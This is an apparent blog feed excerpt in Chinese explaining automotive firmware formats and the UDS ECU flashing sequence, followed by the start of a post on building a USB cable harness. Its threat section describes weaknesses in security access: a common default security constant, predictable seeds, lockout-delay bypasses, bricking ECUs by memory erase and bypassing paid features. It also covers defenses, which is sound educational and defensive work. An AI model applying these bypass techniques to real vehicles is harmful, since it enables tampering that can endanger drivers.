id="诊断连接方式"><a href="#诊断连接方式" class="headerlink" title="诊断连接方式"></a>诊断连接方式</h3><p>诊断设备与ECU连接有两种方式,如下图。</p><ol><li>诊断设备连接网关,由网关将消息转发给ECU;</li><li>诊断设备与ECU直连。</li></ol><p><img src="image-20230424231646155.png" alt="image-20230424231646155" style="zoom: 35%;" /></p><h3 id="固件格式"><a href="#固件格式" class="headerlink" title="固件格式"></a>固件格式</h3><p>S-record、Intel Hex、BIN、VBF 是汽车中MCU固件常用的格式,下面简单介绍一下这几种格式。了解数据格式有助于固件分析、刷写安全测试等。</p><h4 id="S-record"><a href="#S-record" class="headerlink" title="S-record"></a>S-record</h4><p>S-record 是摩托罗拉设计的一种常于MCU内存、EPROM、EEPROM 写入的文档格式,S-record 将二进制数据以ASCII字符表示。常用文件后缀名有 SRECORD、SREC、S19、mot。文件格式如下图。</p><p><img src="Motorola_SREC_Chart.png" alt="img"></p><ul><li><strong>Header Record</strong> 文件头信息,其中记录有模块名称、版本号等;</li><li><strong>Data Record</strong> 数据记录,有 S1、S2、S3 三种类型;</li><li><strong>Count Record(可选)</strong> 包含了先前传输的S1、S2、S3记录的计数;</li><li><strong>Termination Record</strong>,结束记录,有 S7、S8、S9 三种类型。 </li></ul><p><img src="image-20230426114205612.png" alt="image-20230426114205612"></p><p>S0 Record(头记录):记录类型是“S0”。地址场没有被用,用零(0x0000)填充。数据场中的信息使用HEX转换成字符串是:<code>JKE_X1_APP_SOC.s19</code>。此行表示程序的开始,不需烧入内存,用来表述文件的相关信息,可能包含文件名、版本号等。</p><p>S3 Record(数据记录):记录类型是“S3” 。地址场由4个字节地址,数据场由可载入的数据组成。</p><p>S7 Record(结束记录):记录类型是“S7”。地址场由4字节的地址,包含了开始执行地址。没有数据场。此行表示程序的结束,不需烧入内存。</p><p><em>注:</em> S-Record 中记录有固件的起始地址,逆向分析时直接从中获取,然后设置为起始地址即可。</p><h4 id="Intel-HEX"><a href="#Intel-HEX" class="headerlink" title="Intel HEX"></a>Intel HEX</h4><p>在嵌入式MCU程序开发中,经常编译链接后生成的 HEX 就是采用的 Intel Hex 格式。也是一种将二进制文件转换成了ASCII码形式存储的文本文件。</p><p><img src="image-20230426121555714.png" alt="image-20230426121555714"></p><h4 id="BIN"><a href="#BIN" class="headerlink" title="BIN"></a>BIN</h4><p>二进制文件,只有固件数据,没有起始地址、描述信息等。</p><p><img src="image-20230426132304089.png" alt="image-20230426132304089"></p><h4 id="自定义格式"><a href="#自定义格式" class="headerlink" title="自定义格式"></a>自定义格式</h4><p>车企自定义格式如,VBF(Volvo Binary File)。VBF 使用在 volvo、mazda、Ford、吉利等品牌的汽车中。 </p><p>文件头记录有文件的VBF版本号、软件版本信息、ECU物理地址、数据起始地址等。</p><p><img src="image-20230426132731243.png" alt="image-20230426132731243"></p><h4 id="分析工具"><a href="#分析工具" class="headerlink" title="分析工具"></a>分析工具</h4><h5 id="srecord"><a href="#srecord" class="headerlink" title="srecord"></a>srecord</h5><p>命令行工具 srecord</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install srecord</span><br></pre></td></tr></table></figure><p>查看S-record文件信息</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fans@fans:~$ srec_info JKE_X1_APP_SOC.s19 </span><br><span class="line">Format: Motorola S-Record</span><br><span class="line">Header: <span class="string">"JKE_X1_APP_SOC.s19"</span></span><br><span class="line">Execution Start Address: 00FC0000</span><br><span class="line">Data: 01000000 - 01089C5F</span><br><span class="line"> 01180000 - 011800FF</span><br><span class="line"> 0127FB80 - 0127FBDF</span><br><span class="line"> 0127FF80 - 0127FFFF</span><br></pre></td></tr></table></figure><p>文件转换</p><ul><li><p>S-record 转 hex</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srec_cat JKE_X1_APP_SOC.s19 -Motorola -o JKE_X1_APP_SOC.hex -Intel</span><br></pre></td></tr></table></figure></li><li><p>Intel hex 转 S-record </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srec_cat JKE_X1_APP_SOC.hex -Intel -o JKE_X1_APP_SOC.s19 -Motorola</span><br></pre></td></tr></table></figure></li><li><p>S-record 转 bin</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srec_cat JKE_X1_APP_SOC.s19 -Motorola -o JKE_X1_APP_SOC.bin -bin</span><br></pre></td></tr></table></figure></li></ul><h5 id="HexView"><a href="#HexView" class="headerlink" title="HexView"></a>HexView</h5><p>S-record、Intel Hex、BIN 文件之间的转换可以采用 Vector 的图形化文件编辑软件 HexView。</p><p><img src="image-20230426103115056.png" alt="image-20230426103115056" style="zoom:70%;" /><img src="E:/Team/青骥/知识分享/车联网安全基础知识之27服务.assets/image-20230426103347242.png" alt="image-20230426103347242" style="zoom:70%;" /></p><h5 id="专用工具"><a href="#专用工具" class="headerlink" title="专用工具"></a>专用工具</h5><p>主机厂或供应商自己开发的专用软件,如VBF文件查看工具 VBF Tool. </p><p><img src="image-20230426142754998.png" alt="image-20230426142754998"></p><h5 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h5><p>根据文件格式定义,编写脚本解析、提供固件,部分可以在 Github 上找。</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># wget https://raw.githubusercontent.com/consp/vbfdecode/master/vbfdecode.py</span></span><br><span class="line"><span class="comment"># python vbfdecode.py -b firmware.vbf</span></span><br><span class="line">Offset: 0x359, Location: 0x18000, Size: 0xB256C, Data Offset: 0x361</span><br><span class="line">VBF v2.1</span><br><span class="line">Description: Software part: 1234 <span class="built_in">type</span>: APP</span><br><span class="line">Network: 0x00000000</span><br><span class="line">Data Format Identifier: 0x00000000</span><br><span class="line">ECU address: 0x000007C6</span><br><span class="line">Frame_format:</span><br><span class="line">Erase frames:</span><br><span class="line">Data blobs:</span><br><span class="line">0x00018000 0x000B256C e301</span><br><span class="line"></span><br><span class="line">Saving:</span><br><span class="line"> 18000.bin</span><br></pre></td></tr></table></figure><h2 id="UDS-刷写"><a href="#UDS-刷写" class="headerlink" title="UDS 刷写"></a>UDS 刷写</h2><p>使用 CANoe 等工具刷写时,开发环境后台帮助我们完成了很多工作,平常大家很少注意这背后到底发生了什么。下面就来看看整个刷写流程。</p><p><img src="image-20230410232506539.png" alt="image-20230410232506539" style="zoom:75%;" /></p><p>刷写过程定义了<strong>刷写前、刷写中、刷写后</strong>三个阶段, 负责将正确的刷写文件( S19 或者 HEX) 下载到 ECU 中。 </p><h3 id="1-刷写前-设置刷写网络"><a href="#1-刷写前-设置刷写网络" class="headerlink" title="1 刷写前(设置刷写网络 )"></a>1 刷写前(设置刷写网络 )</h3><p>刷写前,刷写工具读取 ECU 的 Boot 软件版本号(F180)、软件版本(F188)、 VIN(F190)、 硬件版本(F191),根据从 ECU 获取到的相关信息到刷写数据库中查找对应的升级文件。维修店代码或诊断设备序列号(F198)、刷写日期(F199)在刷写启动时写入,用于追溯之前的刷写操作。</p><p>刷写准备阶段需要确认待刷写控制器的相关版本信息, 设置刷写网络等。 这个阶段在整车各个控制器的应用程序中执行, 此阶段, 使用功能地址向网络上的各控制器发出诊断请求进行网络设置。 </p><h4 id="1-1-切换到扩展模式-10-03"><a href="#1-1-切换到扩展模式-10-03" class="headerlink" title="1.1 切换到扩展模式(10 03)"></a>1.1 切换到扩展模式(10 03)</h4><p>默认状态下 ECU 在 01 默认会话中,使用UDS 会话切换(10 03)进入拓展会话。</p><h4 id="1-2-检查刷写前提条件-31-01-XX-XX"><a href="#1-2-检查刷写前提条件-31-01-XX-XX" class="headerlink" title="1.2 检查刷写前提条件(31 01 XX XX)"></a>1.2 检查刷写前提条件(31 01 XX XX)</h4><p>整车厂通常会定义一些控制器刷写的前提条件,比如车速要低于3km/h等,这一步就可以检查刷写前提条件是否满足。不同的OEM/Tier1可能有不同的检查条件。常见的前置条件如下,</p><ul><li>ECU 的电源电压不能太高或者太低(9V-16V) </li><li>车辆处于 IGN On 状态, 但不在 Ready 状态</li><li>车辆处于静止状态,车速为 0km/h </li></ul><p>具体实现上,使用 <strong>31服务</strong> 执行检查编程条件的例程 routine,如条件不满足(比如车速过高等),则退出刷写。</p><h4 id="1-3-停用故障码存储功能-85-02"><a href="#1-3-停用故障码存储功能-85-02" class="headerlink" title="1.3 停用故障码存储功能(85 02)"></a>1.3 停用故障码存储功能(85 02)</h4><p> 刷写过程中,控制器功能不正常,可能不能收发总线消息,这种情况下,需要避免在这个过程中触发故障码存储。使用85诊断故障码设置服务设置故障码设置类型为OFF(02)关闭DTC的存储。</p><h4 id="1-4-停止发送一般通讯报文-28-01-01-XX-XX"><a href="#1-4-停止发送一般通讯报文-28-01-01-XX-XX" class="headerlink" title="1.4 停止发送一般通讯报文(28 01 01 XX XX)"></a>1.4 停止发送一般通讯报文(28 01 01 XX XX)</h4><p> 刷写过程中,因为传输的数据较多,因此停用通讯报文的发送可以降低总线负载。</p><p>使用28服务关闭与诊断无关的报文,将节约出来的通信资源用于刷写软件,提升刷写速度。</p><h3 id="2-刷写中-认证-amp-下载数据"><a href="#2-刷写中-认证-amp-下载数据" class="headerlink" title="2 刷写中(认证&下载数据)"></a>2 刷写中(认证&下载数据)</h3><p>刷写中首先进行身份认证,而后可以写入指纹,然后执行刷写擦除内存,向指定地址下载固件,并检查写入是否正确。</p><h4 id="2-1-切换到编程会话-10-02"><a href="#2-1-切换到编程会话-10-02" class="headerlink" title="2.1 切换到编程会话(10 02)"></a>2.1 切换到编程会话(10 02)</h4><p> 刷写过程必须要在<strong>编程会话</strong>中才可以进行。使用会话控制服务 10 02 切换到 programming session。</p><h4 id="2-2安全访问-请求种子-27-01"><a href="#2-2安全访问-请求种子-27-01" class="headerlink" title="2.2安全访问-请求种子(27 01)"></a>2.2安全访问-请求种子(27 01)</h4><p><strong>27 安全访问服务</strong> 保证是有权限的人员或者设备才能够进行刷写,<strong>安全访问</strong>服务子功能<strong>请求种子</strong>向 ECU 请求安全认证种子。</p><h4 id="2-3-安全访问-发送与验证Key-27-02"><a href="#2-3-安全访问-发送与验证Key-27-02" class="headerlink" title="2.3 安全访问-发送与验证Key(27 02)"></a>2.3 安全访问-发送与验证Key(27 02)</h4><p>诊断设备收到种子后,将种子作为输入,使用双方已知的算法,计算得到Key。然后使用子功能<strong>发送秘钥</strong>将计算得到的秘钥发送给ECU。ECU使用相同的算法计算出秘钥并与收到的值进行对比,相同则认证通过。</p><p>如果连续多次认证失败,安全访问会暂停服务一段时间。每认证失败一次,ECU安全访问失败计数器就会加1。当错误次数达到3次后,将收到0x36(尝试次数超限)的否定响应码,并延时10秒。10秒之内请求会收到0x37(延时时间未到)的否定响应码,10s之后才能再次发起认证请求。</p><h4 id="2-4-写入指纹-2E-XX-XX-YY-YY-…"><a href="#2-4-写入指纹-2E-XX-XX-YY-YY-…" class="headerlink" title="2.4 写入指纹(2E XX XX YY YY …)"></a>2.4 写入指纹(2E XX XX YY YY …)</h4><p>记录刷写时间(F198)、写入指纹信息(F199),标记写软件人的身份(维修店编号、诊断设备序列号)。</p><h4 id="2-5-擦除内存-31-01-FF-00-AB-XX-XX-YY-YY"><a href="#2-5-擦除内存-31-01-FF-00-AB-XX-XX-YY-YY" class="headerlink" title="2.5 擦除内存(31 01 FF 00 AB XX XX YY YY)"></a>2.5 擦除内存(31 01 FF 00 AB XX XX YY YY)</h4><p>在向 ECU 的内存区域下载数据之前, 需要先擦除内存区域已有数据。 </p><p>采用 31 例程控制服务 FF00 擦除内存,根据控制器地址空间分配和芯片擦除能力,单次擦除所有或多次分段擦除。</p><p><em>31 01 FF 00 地址字款,地址字宽 擦除起始地址 擦除长度</em><br>擦除起始地址,擦除长度的长度通常为4个字节,此时AB为0x44。</p><h4 id="2-6-请求下载-34-XX-YY-ZZ-ZZ-AA-AA"><a href="#2-6-请求下载-34-XX-YY-ZZ-ZZ-AA-AA" class="headerlink" title="2.6 请求下载(34 XX YY ZZ ZZ AA AA)"></a>2.6 请求下载(34 XX YY ZZ ZZ AA AA)</h4><p>向ECU传输软件之前需要指定写入的地址和数据的大小。</p><p>刷写设备使用 34 请求下载服务向 ECU 指定刷写起始地址和刷写数据的大小, 请求下载 ($34)服务指定的内存从起始到结束应该是连续的。如果不是连续的,刷写设备应该为每个要刷写的数据块发送一个单独的请求。 </p><p><em>34 数据格式标识符 地址和长度格式标识 内存地址 内存大小</em></p><h4 id="2-7-传输数据-36-XX-YY-YY-…"><a href="#2-7-传输数据-36-XX-YY-YY-…" class="headerlink" title="2.7 传输数据(36 XX YY YY …)"></a>2.7 传输数据(36 XX YY YY …)</h4><p>软件下载服务,将数据下载到上一步指定的内存中。</p><p>刷写设备使用 36 传输数据服务向 ECU 内存区域中传输刷写的数据,一个数据块通常需要多条传输数据服务传输。</p><p> <em>36 数据块顺序计数器 数据</em></p><h4 id="2-8-请求传输退出-37"><a href="#2-8-请求传输退出-37" class="headerlink" title="2.8 请求传输退出 (37)"></a>2.8 请求传输退出 (37)</h4><p>37 服务退出当前连续内存区域的刷写,将在肯定响应中携带校验和,校验最近的一条请求下载请求服务指定的内存区域。</p><p>返回的校验和与刷写设备计算的校验和进行比较,如果不相同,将重新使用 36 数据传输服务下载数据,多次校验不通过,刷写将会中断。</p><h4 id="2-9-检查存储空间-31-01-02-02"><a href="#2-9-检查存储空间-31-01-02-02" class="headerlink" title="2.9 检查存储空间(31 01 02 02)"></a>2.9 检查存储空间(31 01 02 02)</h4><p>检验刷写的数据的可靠性,在软件/数据刷写完毕时,刷写设备通过例行程序服务来验证刷写到内存区域的每块数据是否成功。</p><p>检查刷写的数据的完整性,确定来源合法,通过CRC、哈希、数字签名等方法,保证刷写过程中不会出错,且刷写的数据是来自合法的提供者。</p><h4 id="2-10-检查编程依赖-31-01-FF-01"><a href="#2-10-检查编程依赖-31-01-FF-01" class="headerlink" title="2.10 检查编程依赖(31 01 FF 01)"></a>2.10 检查编程依赖(31 01 FF 01)</h4><p>使用 31 例程控制服务 FF01 确认刷入的软件和ECU的硬件,基础软件是匹配的。</p><h4 id="2-11-ECU复位-11-01"><a href="#2-11-ECU复位-11-01" class="headerlink" title="2.11 ECU复位(11 01)"></a>2.11 ECU复位(11 01)</h4><p>整个刷写完成后,刷写设备要求 ECU 硬件复位, ECU 进入应用程序。</p><p>11 复位服务重启ECU,使刷写的新软件生效。</p><h3 id="3-刷写后-还原网络"><a href="#3-刷写后-还原网络" class="headerlink" title="3 刷写后(还原网络)"></a>3 刷写后(还原网络)</h3><p> 刷写后的步骤与刷写前的步骤是对应的,启用刷写前禁用的通信等。</p><p>此时网络恢复到正常的模式, ECU 以默认的波特率进行正常的通信,并能进行故障码的检测和存储。 刷写结束后要求各 ECU 恢复非诊断消息的发送及接收 。</p><h4 id="3-1-切换到扩展模式-10-03"><a href="#3-1-切换到扩展模式-10-03" class="headerlink" title="3.1 切换到扩展模式(10 03)"></a>3.1 切换到扩展模式(10 03)</h4><p>默认状态下 ECU 在 01 默认会话中,使用UDS 会话切换(10 03)进入拓展会话。在拓展会话中,启用非诊断通信、清除刷写阶段产生的故障码、各 ECU 恢复故障码的检测。</p><h4 id="3-2-启用发送一般通讯报文-28-00-01-XX-XX"><a href="#3-2-启用发送一般通讯报文-28-00-01-XX-XX" class="headerlink" title="3.2 启用发送一般通讯报文(28 00 01 XX XX)"></a>3.2 启用发送一般通讯报文(28 00 01 XX XX)</h4><p>使用 28 通信控制服务启用在刷写前停止收发的一般通讯报文。</p><h4 id="3-3-各-ECU-恢复故障码的检测-85-01"><a href="#3-3-各-ECU-恢复故障码的检测-85-01" class="headerlink" title="3.3 各 ECU 恢复故障码的检测(85 01)"></a>3.3 各 ECU 恢复故障码的检测(85 01)</h4><p>恢复故障码检测,使用85诊断故障码设置服务设置故障码设置类型为ON(01)恢复DTC的存储。</p><h4 id="3-4-ECU-回到默认模式-10-01"><a href="#3-4-ECU-回到默认模式-10-01" class="headerlink" title="3.4 ECU 回到默认模式(10 01)"></a>3.4 ECU 回到默认模式(10 01)</h4><p>从拓展会话切换回默认会话。</p><h3 id="刷写流程图"><a href="#刷写流程图" class="headerlink" title="刷写流程图"></a>刷写流程图</h3><p><img src="image-20230427111842337.png" alt="image-20230427111842337"></p><h2 id="安全威胁"><a href="#安全威胁" class="headerlink" title="安全威胁"></a>安全威胁</h2><p>刷写中最主要的安全维修就是安全访问被突破,而后就能<strong>获取ECU中的软件/数据</strong>以及<strong>刷入篡改的固件</strong>。</p><h3 id="安全访问算法"><a href="#安全访问算法" class="headerlink" title="安全访问算法"></a>安全访问算法</h3><p>安全访问算法一般采用对称加密算法,通常还是简单的移位算法,算法强度较低。</p><ul><li><p><strong>故障注入:</strong>算法大部分主机厂自己设计实现的,算法本身的安全性很少验证。使用故障注入等方式存在被绕过认证的可能。</p><p><img src="image-20230426164557432.png" alt="image-20230426164557432" style="zoom:50%;" /></p></li><li><p><strong>泄露:</strong> 主机厂/供应商代码、企标等在互联网上泄露。</p><p><img src="image-20230426161719829.png" alt="image-20230426161719829" style="zoom:80%;" /></p></li><li><p><strong>易被逆向:</strong>seed2key 一般以 so 文件存在,对固件、诊断仪中的库文件逆向得到安全访问算法。</p><p><img src="image-20230426165344244.png" alt="image-20230426165344244"></p></li></ul><h3 id="Key"><a href="#Key" class="headerlink" title="Key"></a>Key</h3><ul><li><strong>配置问题</strong>:Key的有效长度过短,CVE-2017-14937 安全气囊安全访问(SA)Key为2个字节,第一个字节恒为0x01,那么气囊点火算法只有256个可能的密钥对。</li></ul><h3 id="安全常量"><a href="#安全常量" class="headerlink" title="安全常量"></a>安全常量</h3><p>除了算法本身以外,最重要的就是安全常量。安全常量通常为4个字节。</p><ul><li><p><strong>安全常量硬编码</strong>:安全常量硬编码在so库中,逆向安全访问算法得到安全常量。</p><p><img src="image-20230426161424710.png" alt="image-20230426161424710"></p></li><li><p><strong>默认:</strong> 使用默认的安全常量,在渗透测试中曾多次遇到,<code>0xc541a9</code> 是最常见的安全常量。</p></li><li><p><strong>使用相同常量</strong>:使用同一种算法的ECU依赖于不同的安全常量来保障安全性。不会因为一个模块算法和常量被分析出来之后,直接影响到另外一个模块上。此外,同一车型同一类型ECU的常量通常相同,很少有实现一机一密的。</p></li></ul><h3 id="种子"><a href="#种子" class="headerlink" title="种子"></a>种子</h3><ul><li><p><strong>种子可被预测:</strong>某车型中的种子基于时间产生,获取到Mask后,能够预测到后续的种子。预测到种子能够缩减破解的时间。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> uint32 <span class="title">UDS_GenerateSeed</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> uint32 u32LocalSeedValue;</span><br><span class="line"> </span><br><span class="line"> u32LocalSeedValue = STM0_TIM0.U;</span><br><span class="line"> u32LocalSeedValue ^= UDS_ku32LocLevel01;</span><br><span class="line"> u32LocalSeedValue = ( u32LocalSeedValue << <span class="number">7</span> ) | ( u32LocalSeedValue >> <span class="number">24</span> );</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> u32LocalSeedValue;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></li><li><p><strong>种子随机性</strong>:种子随机性较弱,多次请求出现相同种子的情况。</p></li><li><p><strong>固定种子</strong>:每次获取到的种子相同,这使得爆破出Key成为了可能。</p></li><li><p><strong>种子恢复</strong>:ECU复位后种子相同,每认证一次后复位一次,能够有效降低爆破的数量级。</p></li></ul><h3 id="安全防护-Bypass"><a href="#安全防护-Bypass" class="headerlink" title="安全防护 Bypass"></a>安全防护 Bypass</h3><ul><li>直接从应用层绕过,对一些实现了远程诊断的车型,直接调用应用层,操作敏感功能,而无需要关注安全访问。</li><li>ECU Reset 重置绕过安全访问延时。</li><li>安全访问延时绕过,2010 年的 VW Golf 转向ECU 在 K线上实现的UDS,使用低权限的用户登录后认证失败计算器就是清零。在爆破高权限时,在中间穿插一些低权限用户登录就能持续爆破。 </li></ul><hr><h3 id="拒绝服务"><a href="#拒绝服务" class="headerlink" title="拒绝服务"></a>拒绝服务</h3><ul><li>持续发送错误的消息,将触发10s延时认证,影响正常的刷写。</li><li>31 服务擦除内存,使 ECU 变砖。</li><li>刷写前提条件不健全,如车辆在运行中执行刷写流程,影响行车安全;正常行驶中,停止通信报文发送,出现异常。</li></ul><h3 id="窃听获取固件"><a href="#窃听获取固件" class="headerlink" title="窃听获取固件"></a>窃听获取固件</h3><p>由于CAN广播传输的特性,任何节点都能接收到发送的消息。当下载固件时,如果固件没有加密传输(在请求下载中指定为不加密) ,持续监听总线,当执行ECU升级时,能够监听获取到固件。</p><h3 id="非法刷写"><a href="#非法刷写" class="headerlink" title="非法刷写"></a>非法刷写</h3><ul><li>34、36 缺乏身份认证,在未经身份认证的情况下刷写。</li><li>安全认证被突破,刷入非法固件。</li></ul><h3 id="软件付费绕过"><a href="#软件付费绕过" class="headerlink" title="软件付费绕过"></a>软件付费绕过</h3><p>经过认证后,通过篡改固件或发送伪造消息启用需要额外付费的功能。</p><h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><ul><li><p><strong>使用非对称算法</strong>: 使用<strong>29服务</strong>替代<strong>27服务</strong>,29服务支持非对称算法,安全性能够得到很大的提升。即使算法泄露,也不会造成影响。</p></li><li><p><strong>安全常量采用安全存储:</strong> 自行实现的对称加密算法安全常量通常硬编码在so库中,容易被逆向出。安全常量应采用安全存储。</p></li><li><p><strong>算法逻辑安全:</strong> ECU复位后,产生的种子每次都一样,应避免采用类似缺陷的算法;敏感功能都受到安全访问保护。</p></li><li><p><strong>安全配置</strong>: Key 的有效长度能够有效防御暴力破解等;刷写前置条件健全,在特定条件下方能执行刷写流程。</p></li><li><p><strong>安全启动</strong>:应用安全启动,当安全访问被突破后,拒绝启动刷入经过篡改的固件。</p></li><li><p><strong>安全传输:</strong> 固件采用加密传输,请求下载数据传输标识指明为加密传输,并对应使用加密固件。</p></li><li><p><strong>监测:</strong> 检测潜在的攻击,及时阻断。</p></li><li><p><strong>还原:</strong>检测到被篡改,通过备份、云端等信息恢复。</p></li></ul><h2 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h2><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><p>ISO14229 Unified diagnostic services (UDS) — Part 1</p></li><li><p>XXXX ECU刷新规范</p></li><li><p><a href="https://delikely.github.io/Automotive-Security-Timeline/">车联网安全事件时间轴</a></p></li><li><p><a href="https://delikely.github.io/2099/01/01/automotive-security/">汽车安全</a></p></li><li><p><a href="https://blog.csdn.net/qq_34309267/article/details/108372077?utm_source=app&app_version=4.15.1">Bootloder开发方案(基于UDS)</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/4GKgaRp_FElSpUdUeEx2yQ">基于UDS的ECU软件刷写流程</a></p></li><li><p><a href="https://zhuanlan.zhihu.com/p/446348996">UDS诊断服务基础篇之27</a></p></li><li><p><a href="https://blog.csdn.net/qq_34414530/article/details/129406839">CANoe中使用CAPL刷写流程详解(Trace图解)</a></p></li><li><p><a href="https://blog.csdn.net/CynalFly/article/details/122089747">【VCU】详解S19文件(S-record)</a></p></li><li><p><a href="https://en.wikipedia.org/wiki/SREC_(file_format">SREC (file format) - Wikipedia</a>)</p></li><li><p><a href="https://blog.hoxbot.com/มาตรฐาน-intel-hex-file-format/">Intel HEX file format</a></p></li><li><p><a href="https://en.wikipedia.org/wiki/Intel_HEX">Intel HEX - Wikipedia</a></p></li><li><p><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Milburn-There-Will-Be-Glitches-Extracting-And-Analyzing-Automotive-Firmware-Efficiently.pdf">us-18-Milburn-There-Will-Be-Glitches-Extracting-And-Analyzing-Automotive-Firmware-Efficiently</a></p></li></ul>]]></content>
<summary type="html"><h1 id="车联网安全基础知识之UDS刷写"><a href="#车联网安全基础知识之UDS刷写" class="headerlink" title="车联网安全基础知识之UDS刷写"></a>车联网安全基础知识之UDS刷写</h1><p>有段时间没写文章了,之前计划要写的<</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之USB SPH2.0线束制作</title>
<link href="http://delikely.github.io/2022/10/19/DIY-USB-SPH2-0/"/>
<id>http://delikely.github.io/2022/10/19/DIY-USB-SPH2-0/</id>
<published>2022-10-19T06:12:34.000Z</published>
<updated>2022-11-09T09:17:31.809Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全基础知识之USB-SPH2-0线束制作"><a href="#车联网安全基础知识之USB-SPH2-0线束制作" class="headerlink" title="车联网安全基础知识之USB SPH2.0线束制作"></a>车联网安全基础知识之USB SPH2.0线束制作</h2><p>车机/TBOX使用的USB接口有好几个类型,不同车型的线序也可能存在差异。USB TYPE-A 双工头线相比搞车的必定人手一条。在对单个模块的测试中,此时只有双公头TYPE-A 是不行的,设备上的USB口是插针式的公头,此时我们就需要一些不太常见的USB公头转TYPE-A转接线。TBOX和车机上常见的USB接头有 SPH2.0、HSD等。这些异形的插头,在淘宝上买很难满足我们的需要(线序非标),这时需要自己来做线束。</p><p>今天就和大家分享以下 USB 之 SPH2.0 接头的制作。HSD 的下次在分享。</p><p><img src="image-20221018093807275.png" alt="image-20221018093807275" style="zoom: 67%;" /><img src="image-20221018094629425.png" alt="image-20221018094629425" style="zoom: 113%;" /><img src="image-20221018142545857.png" alt="image-20221018142545857" style="zoom:130%;" /></p><p>虽然都是4个针脚但是他们的防呆设计有所不同,所以需要一个小的接插件适配不同防呆方案。接下来就是需要去找个这样一个接插件。</p><h3 id="购买材料"><a href="#购买材料" class="headerlink" title="购买材料"></a>购买材料</h3><p>看出了接口是方形的USB接口,但不知道这种接口叫做什么,于是在淘宝上找呀找,找了很久终于发现这种接口叫做 SPH2.0,其中2.0表示两个针脚的间距为 2.0mm。知道接口名称后,就方便了,买一些线束材料就可以自己按需制作了。需要用到的材料和工具如下。</p><ul><li><p><strong>4芯 USB 公头开口线</strong>,由于我们的目的是连接到电脑上,所以我们需要的是USB TYPE-A 开口线。使用TYPE-A 母头开口线也可以的,只是连接电脑的时候需要再连接一个USB TYPE-A 双公头开口线。</p><p><img src="image-20221018100836355.png" alt="image-20221018100836355"></p></li><li><p><strong>SPH2.0 2*2 双排带扣插件</strong>,USB接口为4针(2*2),带不带扣无所谓,买到的大部分都有,不影响使用,如果插不进去,可以直接用刀片去掉。 </p><p><img src="image-20221018101106499.png" alt="image-20221018101106499" style="zoom:40%;" /></p></li><li><p><strong>SPH2.0 端子</strong>,端子可以多买点比较便宜,刚开始做可以拿几个连接杜邦线试试手。</p><p><img src="image-20221018095832468.png" alt="image-20221018095832468"></p></li></ul><ul><li><p><strong>压线钳</strong>,用于SPH2.0 端子与USB公头开口线连接。</p><p><img src="image-20221018100617596.png" alt="image-20221018100617596"></p></li><li><p><strong>万用表</strong>,用来确定线序,还可以验证制作的转接线连接状态是否完好。</p></li></ul><h3 id="分析针脚定义"><a href="#分析针脚定义" class="headerlink" title="分析针脚定义"></a>分析针脚定义</h3><p>不同厂商的针脚定义可能不同,需要我们自己分析。首先最容易的找到的就是GND,使用万用表测试四个针脚与USB金属外壳的连通性,发出蜂鸣音量的就是GND。他的对角就是VCC(自己经验总结出来的)。剩下的就是D+ 和 D-,这两个可以看板子上的连接的芯片的引脚,很多的使用的BGA封装的不好测。还有一个简单粗暴的方法,就是D+和D-随便插,然后看电脑上的反应,看能不能识别出USB设备,如果不行就交换线序。如下是这次我需要做的线束定义,如果插错了也没关系,可以使用镊子或一字螺丝刀轻轻翘起卡扣,从SPH2.0双排带扣插件中拔出错误的SPH2.0端子,重新插入对应位置即可。</p><p><img src="image-20221018001231089.png" alt="image-20221018001231089"></p><h3 id="制作"><a href="#制作" class="headerlink" title="制作"></a>制作</h3><ol><li>取一个 SPH2.0 端子</li><li>压线钳凹面向下,左手拿端子,将端子开口朝向压线钳压线口凹面,端子与压线口右侧齐平</li><li>轻轻下压,端子微微变形</li><li>然后从右侧插入USB开口线,由于压线钳两侧一高一低,插入进去绝缘皮刚好顶到左边的一侧</li><li>继续下压,压好之后,压线钳自动弹起,取出即可</li><li>重复1-4将剩下的3个端子与USB开口线连接好</li><li>按照针脚定义将端子插入到SPH2.0 2*2 双排带扣插件中,需要注意的是端子凸起的地方需要朝外刚好与端子外侧卡住。</li><li>最后使用杜邦线公头顶一下端子,使端子与插件连接好。</li></ol><p>做线束之前去网上搜了一圈教学视频,但没有找到。既然没有那就自己拍一个,以下是制作的讲解视频,第一次做视频还很生疏,有疑问的私信联系。</p><iframe src="//player.bilibili.com/player.html?aid=986715861&bvid=BV1mt4y1M7qh&cid=865302871&page=1" 